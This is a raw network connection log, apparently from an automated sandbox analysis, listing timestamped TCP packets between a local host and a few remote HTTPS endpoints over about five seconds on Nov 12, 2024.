                                                        Nov 12, 2024 16:27:56.892391920 CET4434998213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:56.892456055 CET4434998213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:56.892596960 CET49982443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:56.892757893 CET49982443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:56.892775059 CET4434998213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:56.892785072 CET49982443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:56.892790079 CET4434998213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:56.895826101 CET49986443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:56.895860910 CET4434998613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:56.895927906 CET49986443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:56.896131992 CET49986443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:56.896147013 CET4434998613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:57.102823973 CET4434998313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:57.103585005 CET49983443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:57.103612900 CET4434998313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:57.104161024 CET49983443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:57.104165077 CET4434998313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:57.233709097 CET4434998313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:57.233783007 CET4434998313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:57.233922005 CET49983443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:57.234214067 CET49983443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:57.234251976 CET4434998313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:57.234267950 CET49983443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:57.234282017 CET4434998313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:57.237833023 CET49987443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:57.237885952 CET4434998713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:57.238131046 CET49987443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:57.238327026 CET49987443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:57.238344908 CET4434998713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:57.347259045 CET4434998413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:57.347894907 CET49984443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:57.347918987 CET4434998413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:57.348472118 CET49984443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:57.348479033 CET4434998413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:57.479060888 CET4434998413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:57.479140043 CET4434998413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:57.479227066 CET49984443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:57.479743004 CET49984443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:57.479759932 CET4434998413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:57.483580112 CET49988443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:57.483627081 CET4434998813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:57.483696938 CET49988443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:57.483911991 CET49988443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:57.483927011 CET4434998813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:57.573424101 CET4434998513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:57.574007988 CET49985443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:57.574034929 CET4434998513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:57.574774981 CET49985443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:57.574781895 CET4434998513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:57.631114960 CET4434998613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:57.631813049 CET49986443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:57.631844997 CET4434998613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:57.632380962 CET49986443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:57.632389069 CET4434998613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:57.709141016 CET4434998513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:57.709217072 CET4434998513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:57.710498095 CET49985443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:57.710498095 CET49985443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:57.710654974 CET49985443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:57.710680962 CET4434998513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:57.718831062 CET49989443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:57.718882084 CET4434998913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:57.719278097 CET49989443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:57.722178936 CET49989443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:57.722193956 CET4434998913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:57.763243914 CET4434998613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:57.763465881 CET4434998613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:57.764003038 CET49986443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:57.764192104 CET49986443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:57.764192104 CET49986443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:57.764211893 CET4434998613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:57.764220953 CET4434998613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:57.770174026 CET49990443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:57.770210981 CET4434999013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:57.774360895 CET49990443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:57.774758101 CET49990443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:57.774771929 CET4434999013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:57.914279938 CET49991443192.168.2.640.115.3.253
                                                        Nov 12, 2024 16:27:57.914331913 CET4434999140.115.3.253192.168.2.6
                                                        Nov 12, 2024 16:27:57.914515018 CET49991443192.168.2.640.115.3.253
                                                        Nov 12, 2024 16:27:57.918150902 CET49991443192.168.2.640.115.3.253
                                                        Nov 12, 2024 16:27:57.918168068 CET4434999140.115.3.253192.168.2.6
                                                        Nov 12, 2024 16:27:57.929198027 CET49992443192.168.2.6142.250.185.228
                                                        Nov 12, 2024 16:27:57.929260015 CET44349992142.250.185.228192.168.2.6
                                                        Nov 12, 2024 16:27:57.929532051 CET49992443192.168.2.6142.250.185.228
                                                        Nov 12, 2024 16:27:57.930002928 CET49992443192.168.2.6142.250.185.228
                                                        Nov 12, 2024 16:27:57.930021048 CET44349992142.250.185.228192.168.2.6
                                                        Nov 12, 2024 16:27:58.025646925 CET4434998713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:58.026413918 CET49987443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:58.026449919 CET4434998713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:58.028176069 CET49987443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:58.028198004 CET4434998713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:58.155102015 CET4434998713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:58.155128956 CET4434998713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:58.155172110 CET4434998713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:58.155242920 CET49987443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:58.155396938 CET49987443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:58.155874014 CET49987443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:58.155895948 CET4434998713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:58.156222105 CET49987443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:58.156227112 CET4434998713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:58.162317038 CET49993443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:58.162350893 CET4434999313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:58.166609049 CET49993443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:58.168549061 CET49993443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:58.168575048 CET4434999313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:58.212431908 CET4434998813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:58.213351011 CET49988443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:58.213381052 CET4434998813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:58.216160059 CET49988443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:58.216166973 CET4434998813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:58.344917059 CET4434998813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:58.345001936 CET4434998813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:58.345128059 CET49988443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:58.345662117 CET49988443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:58.345662117 CET49988443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:58.345679045 CET4434998813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:58.345689058 CET4434998813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:58.352152109 CET49994443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:58.352194071 CET4434999413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:58.356245995 CET49994443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:58.356517076 CET49994443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:58.356540918 CET4434999413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:58.453027964 CET4434998913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:58.453763008 CET49989443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:58.453799009 CET4434998913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:58.454739094 CET49989443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:58.454744101 CET4434998913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:58.496885061 CET4434999013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:58.498169899 CET49990443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:58.498219013 CET4434999013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:58.499146938 CET49990443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:58.499156952 CET4434999013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:58.583389997 CET4434998913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:58.583425999 CET4434998913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:58.583482027 CET4434998913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:58.583513021 CET49989443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:58.583820105 CET49989443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:58.583849907 CET4434998913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:58.583878040 CET49989443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:58.583878994 CET49989443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:58.583887100 CET4434998913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:58.583894014 CET4434998913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:58.586843967 CET49995443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:58.586891890 CET4434999513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:58.586957932 CET49995443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:58.587189913 CET49995443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:58.587207079 CET4434999513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:58.627810001 CET4434999013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:58.627887011 CET4434999013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:58.627935886 CET49990443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:58.628423929 CET49990443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:58.628443003 CET4434999013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:58.634372950 CET49996443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:58.634416103 CET4434999613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:58.634495020 CET49996443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:58.635531902 CET49996443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:58.635545969 CET4434999613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:58.792088985 CET44349992142.250.185.228192.168.2.6
                                                        Nov 12, 2024 16:27:58.815977097 CET49992443192.168.2.6142.250.185.228
                                                        Nov 12, 2024 16:27:58.816025972 CET44349992142.250.185.228192.168.2.6
                                                        Nov 12, 2024 16:27:58.816627026 CET44349992142.250.185.228192.168.2.6
                                                        Nov 12, 2024 16:27:58.817651033 CET49992443192.168.2.6142.250.185.228
                                                        Nov 12, 2024 16:27:58.817724943 CET44349992142.250.185.228192.168.2.6
                                                        Nov 12, 2024 16:27:58.868458033 CET49992443192.168.2.6142.250.185.228
                                                        Nov 12, 2024 16:27:58.891714096 CET4434999313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:58.895977020 CET49993443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:58.896007061 CET4434999313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:58.904124022 CET49993443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:58.904134035 CET4434999313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:59.014678001 CET4434999140.115.3.253192.168.2.6
                                                        Nov 12, 2024 16:27:59.014760017 CET49991443192.168.2.640.115.3.253
                                                        Nov 12, 2024 16:27:59.018903017 CET49991443192.168.2.640.115.3.253
                                                        Nov 12, 2024 16:27:59.018917084 CET4434999140.115.3.253192.168.2.6
                                                        Nov 12, 2024 16:27:59.019177914 CET4434999140.115.3.253192.168.2.6
                                                        Nov 12, 2024 16:27:59.032263041 CET4434999313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:59.032299995 CET4434999313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:59.032344103 CET4434999313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:59.032349110 CET49993443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:59.032391071 CET49993443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:59.038667917 CET49991443192.168.2.640.115.3.253
                                                        Nov 12, 2024 16:27:59.038667917 CET49991443192.168.2.640.115.3.253
                                                        Nov 12, 2024 16:27:59.038685083 CET4434999140.115.3.253192.168.2.6
                                                        Nov 12, 2024 16:27:59.041817904 CET49991443192.168.2.640.115.3.253
                                                        Nov 12, 2024 16:27:59.042099953 CET49993443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:59.042119980 CET4434999313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:59.042138100 CET49993443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:59.042144060 CET4434999313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:59.068178892 CET49997443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:59.068226099 CET4434999713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:59.068285942 CET49997443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:59.074912071 CET49997443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:59.074925900 CET4434999713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:59.083326101 CET4434999140.115.3.253192.168.2.6
                                                        Nov 12, 2024 16:27:59.103729963 CET4434999413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:59.104357958 CET49994443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:59.104392052 CET4434999413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:59.105303049 CET49994443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:59.105309010 CET4434999413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:59.236424923 CET4434999413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:59.236495972 CET4434999413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:59.236546040 CET49994443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:59.255844116 CET49994443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:59.255875111 CET4434999413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:59.255891085 CET49994443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:59.255897999 CET4434999413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:59.265254021 CET49998443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:59.265295982 CET4434999813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:59.265350103 CET49998443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:59.266243935 CET49998443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:59.266256094 CET4434999813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:59.286997080 CET4434999140.115.3.253192.168.2.6
                                                        Nov 12, 2024 16:27:59.288553953 CET49991443192.168.2.640.115.3.253
                                                        Nov 12, 2024 16:27:59.288566113 CET4434999140.115.3.253192.168.2.6
                                                        Nov 12, 2024 16:27:59.288719893 CET49991443192.168.2.640.115.3.253
                                                        Nov 12, 2024 16:27:59.350660086 CET4434999513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:59.352289915 CET49995443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:59.352308989 CET4434999513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:59.354384899 CET49995443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:59.354391098 CET4434999513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:59.483241081 CET4434999513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:59.483308077 CET4434999513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:59.483352900 CET49995443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:59.483724117 CET49995443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:59.483741045 CET4434999513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:59.493139982 CET49999443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:59.493191957 CET4434999913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:59.493248940 CET49999443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:59.494327068 CET49999443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:59.494349003 CET4434999913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:59.927323103 CET4434995313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:59.942543030 CET49953443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:59.942572117 CET4434995313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:59.944185972 CET49953443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:59.944190979 CET4434995313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:00.058536053 CET4434999813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:00.059098959 CET49998443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:00.059138060 CET4434999813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:00.059236050 CET4434999713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:00.059722900 CET49998443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:00.059727907 CET4434999813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:00.060563087 CET49997443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:00.060584068 CET4434999713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:00.061599016 CET49997443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:00.061603069 CET4434999713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:00.332623959 CET4434995313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:00.332672119 CET4434995313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:00.332720041 CET4434995313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:00.332732916 CET49953443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:00.332775116 CET49953443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:00.333046913 CET49953443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:00.333074093 CET4434995313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:00.333091021 CET49953443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:00.333096981 CET4434995313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:00.336539984 CET50000443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:00.336580038 CET4435000013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:00.336697102 CET50000443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:00.336956978 CET50000443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:00.336966038 CET4435000013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:00.454226971 CET4434999813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:00.454380035 CET4434999813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:00.454457998 CET49998443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:00.454621077 CET49998443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:00.454658031 CET4434999813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:00.454675913 CET49998443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:00.454682112 CET4434999813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:00.457799911 CET50001443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:00.457859039 CET4435000113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:00.457982063 CET50001443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:00.458209991 CET50001443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:00.458228111 CET4435000113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:00.458331108 CET4434999713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:00.458358049 CET4434999713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:00.458430052 CET4434999713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:00.458493948 CET49997443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:00.458590031 CET49997443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:00.458602905 CET4434999713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:00.458612919 CET49997443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:00.458616972 CET4434999713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:00.460216045 CET4434999913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:00.460649014 CET49999443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:00.460660934 CET4434999913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:00.460761070 CET50002443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:00.460792065 CET4435000213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:00.460875988 CET50002443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:00.461021900 CET50002443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:00.461030960 CET4435000213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:00.461283922 CET49999443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:00.461287975 CET4434999913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:00.588835001 CET4434999913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:00.588975906 CET4434999913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:00.589045048 CET49999443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:00.593452930 CET49999443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:00.593488932 CET4434999913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:00.593503952 CET49999443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:00.593513966 CET4434999913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:00.597749949 CET50003443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:00.597795963 CET4435000313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:00.597856998 CET50003443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:00.598082066 CET50003443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:00.598093987 CET4435000313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:01.125926018 CET4435000013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:01.131083012 CET50000443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:01.131103992 CET4435000013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:01.131963015 CET50000443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:01.131968975 CET4435000013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:01.191457987 CET4435000113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:01.210834980 CET50001443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:01.210867882 CET4435000113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:01.212183952 CET50001443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:01.212188959 CET4435000113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:01.250761986 CET4435000213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:01.267734051 CET50002443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:01.267759085 CET4435000213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:01.269032955 CET50002443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:01.269038916 CET4435000213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:01.286802053 CET4435000013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:01.286825895 CET4435000013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:01.286916018 CET50000443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:01.286930084 CET4435000013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:01.287280083 CET4435000013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:01.287339926 CET50000443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:01.300031900 CET50000443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:01.300057888 CET4435000013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:01.300069094 CET50000443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:01.300076008 CET4435000013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:01.310194969 CET50004443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:01.310255051 CET4435000413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:01.310369015 CET50004443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:01.312774897 CET50004443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:01.312786102 CET4435000413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:01.339072943 CET4435000113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:01.339843988 CET4435000113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:01.340032101 CET50001443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:01.352430105 CET4435000313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:01.372601032 CET50001443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:01.372634888 CET4435000113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:01.372649908 CET50001443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:01.372657061 CET4435000113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:01.376043081 CET50003443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:01.376055002 CET4435000313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:01.376743078 CET50003443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:01.376748085 CET4435000313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:01.401896000 CET4435000213.107.246.45192.168.2.6
